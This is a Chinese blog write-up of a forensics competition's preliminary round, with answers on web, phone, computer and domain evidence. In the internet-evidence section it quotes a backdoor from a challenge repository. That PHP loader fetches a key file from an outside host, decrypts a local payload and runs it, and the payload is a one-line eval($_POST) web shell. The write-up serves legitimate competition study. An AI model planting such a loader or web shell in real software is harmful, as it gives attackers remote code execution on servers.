2025FIC初赛WP

0X00 写在前面

为了不让自己那么懒惰，于是痛定思痛，决定于2026年3月23日开始每周更新一篇博客，就当激励自己了，这应该还算是第一篇。

彩笔有挺多题不会的（不会的我就空着），嗯，就这样。

参考WP1

参考WP2

0X01 网页取证

1.请分析检材一，该取证录像文件的 SHA256 值为 （大写）

2753DA22FE23CADAADC14FE4C1D5096A153360D9F91097EA376846431F5C1567

2.请分析检材一，远程取证所使用的 OBS 工具版本号为

29.1.3

3.请分析检材一，该检材所使用的远程取证的工具名称为

网镜

4.请分析检材一，在该检材中，远程取证过程中校验的北京时间为

2025/4/9 13:36:18

5.请分析检材一，远程取证的网站 IP 地址为

172.16.10.200

6.请分析检材一，在该检材中，远程取证的网站密码为

admin123

7.请分析检材一，在已固定的“订单列表”中发现有一页缺失，请找出缺失页面的具体页码为

8.请分析检材一，补充“订单列表”中缺失页面的数据后，统计订单的总数为

4000

9.请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发” 的订单数为

10.请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发” 的ZK-101产品的订单数为

11.请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发” 产品在上海区域的订单数为

12.请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的销售情况，并计算“赵磊（13967346658）”优惠后的总金额为（例如，优惠率为10%时按原单价的90%计算）

13.请分析检材一，补充“代理列表”中缺失页面的数据后，统计代理人的最大层级数为（其中顶级代理的用户定义为第1层）

14.请分析检材一，补充“代理列表”中缺失页面的数据后，统计每位代理的直接下游人数， 并确定直接下游人数排名第一的代理人为

15.请分析检材一，补充“代理列表”中缺失页面的数据后，根据地址信息统计各区域的代理人数，并确定上海区域的代理人数为

0X02 手机取证

1.请分析检材二，请分析"手机"检材，并回答，该手机的device_name是？

Redmi 6 Pro

2.请分析检材二，请分析"手机"检材，并回答，嫌疑人pc开机密码是什么？

火眼搜到了

直接进数据表里查：

取第一列和第二列：

1qaz2wsx

3.请分析检材二，请分析"手机"检材，并回答，嫌疑人接头暗号是什么？

定位到源文件后，虽然他没有后缀，但是是sqlite数据库文件，直接打开

发现一张图片，找找看：

爱能不能够永远单纯没有悲哀

4.请分析检材二，请分析"手机"检材，并回答，嫌疑人存放的秘钥环是多少？

前面解了

1qaz2wsx3edc

5.请分析检材二，请分析"手机"检材，并回答，嫌疑人一生中最重要的日子是什么时候？

这个直接用苍穹ai联合火眼搜索就能找到，但是好像我的配置有问题，嗯，对。

在图片里找到251.png:

4.12后推320天是2026年2月26日，傻福ai算的27号，神了

2026年2月26日

6.请分析检材二，请分析"手机"检材，并回答，嫌疑人微信生成的聊天记录数据库文件名称是什么？

EnMicroMsg.db

7.请分析检材二，请分析"手机"检材，并回答，嫌疑人微信账号对应的 UIN 为多少？

1864810197

8.请分析检材二，请分析"手机"检材，并回答，嫌疑人微信聊天记录数据库的加密秘钥是什么？

直接使用妙妙小工具，但是这个IMEI的值我找到的并不是“IMEI一般默认的1234567890ABCDEF”，置空反而能解出来，很奇怪

31ad809

9.请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”的解压密码是多少？

密码就是这个号码

3170010703

10.请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”解压后，其中VeraCrypt容器的MD5值是多少？

没啥说的

83DA62AABC88CB1B23E9469142B67B80

11.请分析检材二，请分析"手机"检材，并回答，嫌疑人提供的“欠条.rar”解压后，其中"1.png"图上显示的VeraCrypt容器密码是多少？

原来的图片看不清，web狗也不会misc，只能交给ai了

!@KE2sax@!da0h5hghg34&@

12.请分析检材二，请分析"手机"检材，并回答，嫌疑人李某全名是什么？

李安弘

13.请分析检材二，请分析"手机"检材，并回答，嫌疑人欠款金额是多少？

答案见上

80000

0X03 计算机取证

1.请分析检材三，请分析"电脑"检材，并回答，该电脑最后一次开机时间是？

不知道为什么我的火眼显示是4/15日，按别的师傅的截图来吧

2025-04-14 11:49:47

2.请分析检材三，请分析"电脑"检材，并回答，嫌疑人的备用机号码是多少？

不看wp写不出来：

18877332134

3.请分析检材三，请分析"电脑"检材，并回答，域名dgy02.com曾保存过一个密码，该密码是多少？

火眼找到的是乱码，直接仿真，然后去google看一下保存的密码：

1qaz2wsx3edc

4.请分析检材三，请分析"电脑"检材，并回答，其电脑安装的微信版本是多少？

4.0.0.21

5.请分析检材三，请分析"电脑"检材，并回答，该系统有哪些远程控制软件

这个也是直接搜：

6.请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，其记录的日志文件名为

日志文件的结尾一般是.log，其次文件名应该是sunlogin，向日葵远控的英文吧可能是~

sunlogin_service.log.2

7.请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，日志内记录对方公网IP地址和端口为

116.192.161.222:2577

8.请分析检材三，请分析"电脑"检材，并回答，某文件的MD5值为“ 2bdfcdbd6c63efc094ac154a28968b7d”，该文件名为

这题没思路可以先看下一题，然后倒回来做：

important.docx

9.请分析检材三，请分析"电脑"检材，据调查，上述文件存放了钱包助记词，第一个单词是什么？

docx文件其实是个zip压缩包，解压后看到important.xml实际上是个jpg文件，丢010里面看一下就知道

或者是直接wx发送，原理是这样的：

solution

10. 请分析检材三（“我的测试机”），最近曾访问过的音频文件，该音频文件的文件名是什么

自传小说.mp3

11.请分析检材三（“我的测试机”），最近曾使用过USB设备，该设备的名称为

只能找到thinkplus

12.请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人现任妻子毕业的大学是？

这录音太长了，只能丢给ai分析，这里使用讯飞听见，等了半个小时之后和我说要钱，差评

拿到转好的文字后直接把问题丢给ai，让他回答就是了，后面几问都是围绕这段音频展开的，具体各位师傅可以去看看我开头贴出的wp

13.请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人是通过一个朋友认识的陈老板，该朋友姓氏拼音是？

14.请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人所说的香格里拉大酒店实则是？

15.请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人银行密码是多少？

0X04 互联网固证

1.请分析检材二，找到李某上游人员陈某博客宣传所用域名为

chen.foren6，自定义顶级域，第二题要考

2.请分析陈某宣传所用域名，该域名的顶级域名在以下那个区块链注册

ETH (Ethereum): 常见的顶级域名后缀是 .eth (ENS)。虽然可以创建子域名，但通常不表现为这种完全自定义的根后缀形式（除非使用特定的反向解析或非常规配置，但不如 HNS 普遍）。

BTC / Namecoin: Namecoin 使用 .bit 后缀。比特币主链本身不直接支持通用的域名系统（虽然有 Layer 2 方案，但通常不以此形式出现）。

HNS (Handshake): Handshake 协议的核心特性就是允许用户注册和拥有自定义顶级域名（Custom TLDs）。用户可以直接竞拍注册像 .foren、.chen 这样任意字符串的顶级域名，而不受 ICANN 限制。

所以答案是：

HNS

3.请分析陈某宣传所用域名的顶级域名的域名解析服务器（DNS）共有几个

查询dns用dig

可能是因为赛后dns服务器关闭了，这里开始就复现不了了，上述是正常的结果，主要记录一下怎么查dns服务器还有ip吧：

dig ns foren6

查ip：

dig ns1.varo

查DNS记录指向邮件服务器域名:

dig mx chen.foren6

4.请分析陈某宣传所用域名的顶级域名的NS1服务器ip为

5.请分析陈某宣传所用域名，该域名DNS记录指向邮件服务器域名为

6.请分析陈某宣传所用域名，该域名的txt记录中chen的值为

7.请分析陈某宣传所用域名，该域名DNS记录没有以下那个域名

admin.chen.foren6

caidan.chen.foren6

fic.chen.foren6

hl.chen.foren6

8.请分析陈某宣传所用域名，该博客域名最终DNS解析指向的github仓库名为

终于可以接着写了，这里答案是：chewhaoN.github.io

9.请分析陈某github账号，陈某对jkroepke/2Moons项目增改了几个文件

知道了账号名直接去访问这个地址即可：https://github.com/chewhaon

我们找到这两个项目，分别clone下来：

然后交给codex：

2

10.请分析陈某github账号，陈某在修改2Moons过程中提到了什么锅底

蜂蜜锅底

11.请分析陈某github账号，陈某在游戏2Moons中放置的后门连接码的密码为

看后门代码：

block.textformat.php

$a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/火锅/蜂蜜锅底.css');
$b=md5($a,true);
$c=file_get_contents('../../../../encrypted.bin');
$d=base64_decode($c);
$e='aes-256-cbc';
$f=openssl_cipher_iv_length($e);
$g=substr($d,0,$f);
$h=substr($d,$f);
$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);

实际上这几行代码就是：

1. 取远程 蜂蜜锅底.css 的内容
2. 对这个内容做 MD5 摘要，得到 16 字节
3. 读取本地 encrypted.bin先做 Base64 解码
4. 前 16 字节当 IV，后面当密文
5. 用 aes-256-cbc 解密
6. 解出来的是一段 PHP，再临时写文件并执行

这里有一个坑点：

正常 AES-256 要 32 字节，而这里的md5实际只有16位

关键在于：这里PHP 的 openssl_decrypt 比较宽松：它把第三个参数当 passphrase，当长度不够时，自动用 \x00 补到算法需要的长度

解密后就是：

function yijuhua() {
    echo "Kangle) is OK! FICer is good!";
    eval($_POST[ficnb])
}

ficnb

12.请访问陈某当前博客，陈某课程的扫码报名地址的域名为

https://fic.forensix.cn

题目要域名：

fic.forensix.cn

13.请分析陈某当前博客，通过互联网找到陈某的旧博客网站标题为

用网页时光机，但是我这里只有26号的记录，7号的我这看不到，然后26号的又看不了。。。。

看看玫幽倩师傅的吧：

柳如烟大战霸天虎

14.请分析陈某旧博客，陈某的姓名为

其实前面欠条也有

陈浩北

15.请分析陈某旧博客，陈某的邮箱地址为

在网页源代码里：

mailme@chen.foren6

16.请分析陈某旧博客，陈某的11位手机号为

上图也有

13170010703

17.请分析陈某旧博客，陈某最爱的dota英雄为

赏金猎人

幻影刺客

斧王

邪影芳灵

根据这个中二的名字，上网搜搜

找到了：https://www.sohu.com/a/202254450_739756

邪影芳灵

0x05 写在后面

第一次完整复现取证比赛，时间线拉的比较长，下次要加快了，嗯，对。

完结撒花~~